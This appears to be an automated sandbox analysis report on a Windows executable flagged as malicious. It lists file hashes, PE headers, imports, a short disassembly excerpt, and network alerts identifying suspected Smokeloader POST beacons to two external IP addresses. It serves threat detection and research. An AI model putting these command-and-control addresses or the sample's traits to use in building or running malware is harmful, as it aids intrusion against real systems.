                                                                                      MD5:EEAD7A529F768CD0A74A639FF806357C
                                                                                      SHA1:5FEA9C1F649F81DFCA7F19AF1CABC8AAB2B01829
                                                                                      SHA-256:2C84B412D0AB9A058D88E5B34E0921C06DA1BA11703EF71C124050406DAD1844
                                                                                      SHA-512:DD28FB4DCBBA20B72E7FB36C2D947A99A8DFFE76D52460D52143992AA98BF0C7EE41CFA9E59FB7D0A7CA3C598B0924254E9764168F5F8031F3BB920F60D562E5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z"TQ;L.Q;L.Q;L.>M..p;L.>M..w;L.>M..2;L.XC..V;L.Q;M..;L.>M..P;L.>M..P;L.>M..P;L.RichQ;L.................PE..L.....3d............................I7............@.............................................................................P........d..........................@...................................@............................................text............................... ..`.rdata..............................@..@.data...h........^..................@....rsrc....d.......f...>..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\explorer.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):26
                                                                                      Entropy (8bit):3.95006375643621
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                      Malicious:true
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):6.992143639446749
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:k8JAXb3Lhs.exe
                                                                                      File size:369'664 bytes
                                                                                      MD5:eead7a529f768cd0a74a639ff806357c
                                                                                      SHA1:5fea9c1f649f81dfca7f19af1cabc8aab2b01829
                                                                                      SHA256:2c84b412d0ab9a058d88e5b34e0921c06da1ba11703ef71c124050406dad1844
                                                                                      SHA512:dd28fb4dcbba20b72e7fb36c2d947a99a8dffe76d52460d52143992aa98bf0c7ee41cfa9e59fb7d0a7ca3c598b0924254e9764168f5f8031f3bb920f60d562e5
                                                                                      SSDEEP:6144:o1JYtwjCacpD0fbtNorAJoKURDOT42P12YO5LqxuGG8eskEGtwc:Ui2jCacpofbtNRJoSHbkGVGtw
                                                                                      TLSH:32748E0353F13C56EB264A32CE2EC6E8761EF561AE1B377A32186A1F14F09B1C663715
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z"TQ;L.Q;L.Q;L.>M..p;L.>M..w;L.>M..2;L.XC..V;L.Q;M..;L.>M..P;L.>M..P;L.>M..P;L.RichQ;L.................PE..L.....3d...........
                                                                                      Icon Hash:512545415559510d
                                                                                      Entrypoint:0x403749
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6433F7E2 [Mon Apr 10 11:49:54 2023 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:1
                                                                                      File Version Major:5
                                                                                      File Version Minor:1
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:1
                                                                                      Import Hash:ff383ac4deafd0aa2c692d1185588d4b
                                                                                      Instruction
                                                                                      call 00007F32B0836241h
                                                                                      jmp 00007F32B08328CEh
                                                                                      push dword ptr [00444FFCh]
                                                                                      call dword ptr [0040E118h]
                                                                                      test eax, eax
                                                                                      je 00007F32B0832A44h
                                                                                      call eax
                                                                                      push 00000019h
                                                                                      call 00007F32B08358DEh
                                                                                      push 00000001h
                                                                                      push 00000000h
                                                                                      call 00007F32B08335DCh
                                                                                      add esp, 0Ch
                                                                                      jmp 00007F32B08335A1h
                                                                                      mov edi, edi
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      sub esp, 20h
                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                      push esi
                                                                                      push edi
                                                                                      push 00000008h
                                                                                      pop ecx
                                                                                      mov esi, 0040E3D8h
                                                                                      lea edi, dword ptr [ebp-20h]
                                                                                      rep movsd
                                                                                      mov dword ptr [ebp-08h], eax
                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                      pop edi
                                                                                      mov dword ptr [ebp-04h], eax
                                                                                      pop esi
                                                                                      test eax, eax
                                                                                      je 00007F32B0832A4Eh
                                                                                      test byte ptr [eax], 00000008h
                                                                                      je 00007F32B0832A49h
                                                                                      mov dword ptr [ebp-0Ch], 01994000h
                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                      push eax
                                                                                      push dword ptr [ebp-10h]
                                                                                      push dword ptr [ebp-1Ch]
                                                                                      push dword ptr [ebp-20h]
                                                                                      call dword ptr [0040E148h]
                                                                                      leave
                                                                                      retn 0008h
                                                                                      mov edi, edi
                                                                                      push ebp
                                                                                      mov ebp, esp
                                                                                      push ecx
                                                                                      push ebx
                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                      add eax, 0Ch
                                                                                      mov dword ptr [ebp-04h], eax
                                                                                      mov ebx, dword ptr fs:[00000000h]
                                                                                      mov eax, dword ptr [ebx]
                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                      mov ebx, dword ptr [ebp+0Ch]
                                                                                      mov ebp, dword ptr [ebp-04h]
                                                                                      mov esp, dword ptr [ebx-04h]
                                                                                      jmp eax
                                                                                      pop ebx
                                                                                      leave
                                                                                      retn 0008h
                                                                                      pop eax
                                                                                      pop ecx
                                                                                      xchg dword ptr [esp], eax
                                                                                      jmp eax
                                                                                      pop eax
                                                                                      pop ecx
                                                                                      xchg dword ptr [esp], eax
                                                                                      jmp eax
                                                                                      pop eax
                                                                                      pop ecx
                                                                                      xchg dword ptr [esp], eax
                                                                                      jmp eax
                                                                                      Programming Language:
                                                                                      • [ASM] VS2010 build 30319
                                                                                      • [C++] VS2010 build 30319
                                                                                      • [ C ] VS2010 build 30319
                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                      • [RES] VS2010 build 30319
                                                                                      • [LNK] VS2010 build 30319
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3e4f00x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x205a0000x164a0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3e5400x1c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3dbc00x40.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1d0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000xcbc40xcc0094972da1bb4ddcc10d81f17166d186cdFalse0.6090303308823529data6.759932634611489IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0xe0000x30f8e0x31000a7160c40f4b2a83dcb49729dcb3251feFalse0.9356365593112245data7.862669112386082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x3f0000x201a2680x5e00b93d1710981d59197efeabe69c67207dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x205a0000x164a00x16600b1ce196108c965bda8576c5bc2bb9aa3False0.38988303072625696data4.436973677856284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_CURSOR0x206c9880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4375
                                                                                      RT_CURSOR0x206cab80xb0Device independent bitmap graphic, 16 x 32 x 1, image size 00.44886363636363635
                                                                                      RT_CURSOR0x206cb900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
                                                                                      RT_CURSOR0x206da380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
                                                                                      RT_CURSOR0x206e2e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
                                                                                      RT_ICON0x205a7e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3686034115138593
                                                                                      RT_ICON0x205a7e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3686034115138593
                                                                                      RT_ICON0x205b6880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.45577617328519854
                                                                                      RT_ICON0x205b6880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.45577617328519854
                                                                                      RT_ICON0x205bf300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45622119815668205
                                                                                      RT_ICON0x205bf300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45622119815668205
                                                                                      RT_ICON0x205c5f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.45809248554913296
                                                                                      RT_ICON0x205c5f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.45809248554913296
                                                                                      RT_ICON0x205cb600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2676348547717842
                                                                                      RT_ICON0x205cb600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2676348547717842
                                                                                      RT_ICON0x205f1080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.30605065666041276
                                                                                      RT_ICON0x205f1080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.30605065666041276
                                                                                      RT_ICON0x20601b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.350177304964539
                                                                                      RT_ICON0x20601b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.350177304964539
                                                                                      RT_ICON0x20606800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.56636460554371
                                                                                      RT_ICON0x20606800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.56636460554371
                                                                                      RT_ICON0x20615280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5437725631768953
                                                                                      RT_ICON0x20615280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5437725631768953
                                                                                      RT_ICON0x2061dd00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.6141618497109826
                                                                                      RT_ICON0x2061dd00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.6141618497109826
                                                                                      RT_ICON0x20623380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.46307053941908716
                                                                                      RT_ICON0x20623380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.46307053941908716
                                                                                      RT_ICON0x20648e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.4871013133208255
                                                                                      RT_ICON0x20648e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.4871013133208255
                                                                                      RT_ICON0x20659880x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4954918032786885
                                                                                      RT_ICON0x20659880x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4954918032786885
                                                                                      RT_ICON0x20663100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                                                                      RT_ICON0x20663100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                                                                      RT_ICON0x20667e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.4914712153518124
                                                                                      RT_ICON0x20667e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.4914712153518124
                                                                                      RT_ICON0x20676880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.46705776173285196
                                                                                      RT_ICON0x20676880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.46705776173285196
                                                                                      RT_ICON0x2067f300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4320809248554913
                                                                                      RT_ICON0x2067f300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4320809248554913
                                                                                      RT_ICON0x20684980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.27593360995850624
                                                                                      RT_ICON0x20684980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.27593360995850624
                                                                                      RT_ICON0x206aa400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.28775797373358347
                                                                                      RT_ICON0x206aa400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.28775797373358347
                                                                                      RT_ICON0x206bae80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.30450819672131146
                                                                                      RT_ICON0x206bae80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.30450819672131146
                                                                                      RT_ICON0x206c4700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.32890070921985815
                                                                                      RT_ICON0x206c4700x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.32890070921985815
                                                                                      RT_STRING0x206ead80x796dataTamilIndia0.4129763130792997
                                                                                      RT_STRING0x206ead80x796dataTamilSri Lanka0.4129763130792997
                                                                                      RT_STRING0x206f2700x550dataTamilIndia0.44485294117647056
                                                                                      RT_STRING0x206f2700x550dataTamilSri Lanka0.44485294117647056
                                                                                      RT_STRING0x206f7c00x328dataTamilIndia0.4628712871287129
                                                                                      RT_STRING0x206f7c00x328dataTamilSri Lanka0.4628712871287129
                                                                                      RT_STRING0x206fae80x6a0dataTamilIndia0.4257075471698113
                                                                                      RT_STRING0x206fae80x6a0dataTamilSri Lanka0.4257075471698113
                                                                                      RT_STRING0x20701880x312dataTamilIndia0.4631043256997455
                                                                                      RT_STRING0x20701880x312dataTamilSri Lanka0.4631043256997455
                                                                                      RT_ACCELERATOR0x206c9400x48dataTamilIndia0.8472222222222222
                                                                                      RT_ACCELERATOR0x206c9400x48dataTamilSri Lanka0.8472222222222222
                                                                                      RT_GROUP_CURSOR0x206cb680x22data1.0588235294117647
                                                                                      RT_GROUP_CURSOR0x206e8480x30data0.9375
                                                                                      RT_GROUP_ICON0x20667780x68dataTamilIndia0.7019230769230769
                                                                                      RT_GROUP_ICON0x20667780x68dataTamilSri Lanka0.7019230769230769
                                                                                      RT_GROUP_ICON0x20606180x68dataTamilIndia0.6826923076923077
                                                                                      RT_GROUP_ICON0x20606180x68dataTamilSri Lanka0.6826923076923077
                                                                                      RT_GROUP_ICON0x206c8d80x68dataTamilIndia0.7211538461538461
                                                                                      RT_GROUP_ICON0x206c8d80x68dataTamilSri Lanka0.7211538461538461
                                                                                      RT_VERSION0x206e8780x25cdata0.5413907284768212
                                                                                      DLLImport
                                                                                      KERNEL32.dllLocalCompact, InterlockedIncrement, GetCurrentProcess, GetLogicalDriveStringsW, CreateJobObjectW, InterlockedCompareExchange, SetVolumeMountPointW, GetTimeFormatA, _lcreat, GetModuleHandleW, SetFileTime, ClearCommBreak, GetConsoleAliasExesW, CreateActCtxW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoW, CreateEventA, GetFileAttributesW, VerifyVersionInfoA, GetModuleFileNameW, GetEnvironmentVariableA, GetTempPathW, InterlockedExchange, GlobalUnfix, GetStdHandle, GetLastError, GetProcAddress, CreateNamedPipeA, CommConfigDialogA, EnumSystemCodePagesW, SetComputerNameA, GlobalFree, GetTempFileNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, CreateHardLinkW, GetNumberFormatW, OpenEventA, QueryDosDeviceW, FoldStringA, SetEnvironmentVariableA, EnumDateFormatsA, GetCurrentDirectoryA, GetShortPathNameW, SetCalendarInfoA, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, GetVersionExA, ReadConsoleInputW, DebugBreak, SetFileAttributesW, LCMapStringW, GetLocaleInfoA, TlsGetValue, SetFilePointer, EnumCalendarInfoA, GetComputerNameA, InterlockedDecrement, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapSize, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW
                                                                                      GDI32.dllGetCharWidthI, GetBkMode, CreateDCW, GetCharWidth32A, GetCharABCWidthsI
                                                                                      WINHTTP.dllWinHttpCloseHandle
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      TamilIndia
                                                                                      TamilSri Lanka
                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-10-01T15:17:23.620395+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973678.89.199.21680TCP
                                                                                      2024-10-01T15:17:24.752008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973778.89.199.21680TCP
                                                                                      2024-10-01T15:17:25.914811+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973878.89.199.21680TCP
                                                                                      2024-10-01T15:17:27.029533+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44973978.89.199.21680TCP
                                                                                      2024-10-01T15:17:28.206437+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974078.89.199.21680TCP
                                                                                      2024-10-01T15:17:29.341890+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974178.89.199.21680TCP
                                                                                      2024-10-01T15:17:30.500449+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974278.89.199.21680TCP
                                                                                      2024-10-01T15:17:31.641582+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974378.89.199.21680TCP
                                                                                      2024-10-01T15:17:33.261390+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974478.89.199.21680TCP
                                                                                      2024-10-01T15:17:34.418617+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974578.89.199.21680TCP
                                                                                      2024-10-01T15:17:35.545596+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974678.89.199.21680TCP
                                                                                      2024-10-01T15:17:36.688527+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974778.89.199.21680TCP
                                                                                      2024-10-01T15:17:37.858454+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974878.89.199.21680TCP
                                                                                      2024-10-01T15:17:38.979866+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44974978.89.199.21680TCP
                                                                                      2024-10-01T15:17:40.096823+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975078.89.199.21680TCP
                                                                                      2024-10-01T15:17:41.358376+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975178.89.199.21680TCP
                                                                                      2024-10-01T15:17:42.684467+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975278.89.199.21680TCP
                                                                                      2024-10-01T15:17:43.812303+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975378.89.199.21680TCP
                                                                                      2024-10-01T15:17:45.121736+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975478.89.199.21680TCP
                                                                                      2024-10-01T15:17:46.345239+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975578.89.199.21680TCP
                                                                                      2024-10-01T15:17:47.480934+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975678.89.199.21680TCP
                                                                                      2024-10-01T15:17:48.777574+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975778.89.199.21680TCP
                                                                                      2024-10-01T15:17:49.901493+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975878.89.199.21680TCP
                                                                                      2024-10-01T15:17:50.981956+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44975978.89.199.21680TCP
                                                                                      2024-10-01T15:17:52.350953+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976078.89.199.21680TCP
                                                                                      2024-10-01T15:17:53.596376+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976178.89.199.21680TCP
                                                                                      2024-10-01T15:18:59.724566+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976378.89.199.21680TCP
                                                                                      2024-10-01T15:19:06.035186+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976478.89.199.21680TCP
                                                                                      2024-10-01T15:19:11.806618+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976578.89.199.21680TCP
                                                                                      2024-10-01T15:19:18.036708+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976678.89.199.21680TCP
                                                                                      2024-10-01T15:19:23.665761+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976778.89.199.21680TCP
                                                                                      2024-10-01T15:19:30.039822+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976878.89.199.21680TCP
                                                                                      2024-10-01T15:19:35.601803+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44976978.89.199.21680TCP
                                                                                      2024-10-01T15:19:42.320909+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977078.89.199.21680TCP
                                                                                      2024-10-01T15:19:47.791066+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.44977178.89.199.21680TCP
                                                                                      2024-10-01T15:19:56.389866+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449772187.131.253.16980TCP
                                                                                      2024-10-01T15:20:02.025493+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449773187.131.253.16980TCP
                                                                                      2024-10-01T15:20:07.324998+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449774187.131.253.16980TCP
                                                                                      2024-10-01T15:20:13.530972+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449775187.131.253.16980TCP
                                                                                      2024-10-01T15:20:19.524009+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449776187.131.253.16980TCP
                                                                                      2024-10-01T15:20:25.648095+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449777187.131.253.16980TCP
                                                                                      2024-10-01T15:20:31.521429+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449778187.131.253.16980TCP
                                                                                      2024-10-01T15:20:36.199335+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449779187.131.253.16980TCP
                                                                                      2024-10-01T15:20:41.110917+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449780187.131.253.16980TCP
                                                                                      2024-10-01T15:20:47.770977+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449781187.131.253.16980TCP
                                                                                      2024-10-01T15:20:54.025223+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449782187.131.253.16980TCP
                                                                                      2024-10-01T15:20:59.510649+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449783187.131.253.16980TCP
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 1, 2024 15:17:22.445229053 CEST4973680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:22.451527119 CEST804973678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:22.451591969 CEST4973680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:22.451747894 CEST4973680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:22.451772928 CEST4973680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:22.456839085 CEST804973678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:22.456938028 CEST804973678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:23.620310068 CEST804973678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:23.620345116 CEST804973678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:23.620394945 CEST4973680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:23.622291088 CEST4973680192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:23.625282049 CEST4973780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:23.628797054 CEST804973678.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:23.631429911 CEST804973778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:23.631508112 CEST4973780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:23.632148027 CEST4973780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:23.632172108 CEST4973780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:23.638276100 CEST804973778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:23.638286114 CEST804973778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:24.751142979 CEST804973778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:24.751873016 CEST804973778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:24.752007961 CEST4973780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:24.752744913 CEST4973780192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:24.756525993 CEST4973880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:24.757467031 CEST804973778.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:24.761313915 CEST804973878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:24.764297009 CEST4973880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:24.764417887 CEST4973880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:24.764436007 CEST4973880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:24.769299030 CEST804973878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:24.769310951 CEST804973878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:25.914532900 CEST804973878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:25.914743900 CEST804973878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:25.914810896 CEST4973880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:25.914952040 CEST4973880192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:25.917706013 CEST4973980192.168.2.478.89.199.216
                                                                                      Oct 1, 2024 15:17:25.919837952 CEST804973878.89.199.216192.168.2.4
                                                                                      Oct 1, 2024 15:17:25.922595978 CEST804973978.89.199.216192.168.2.4
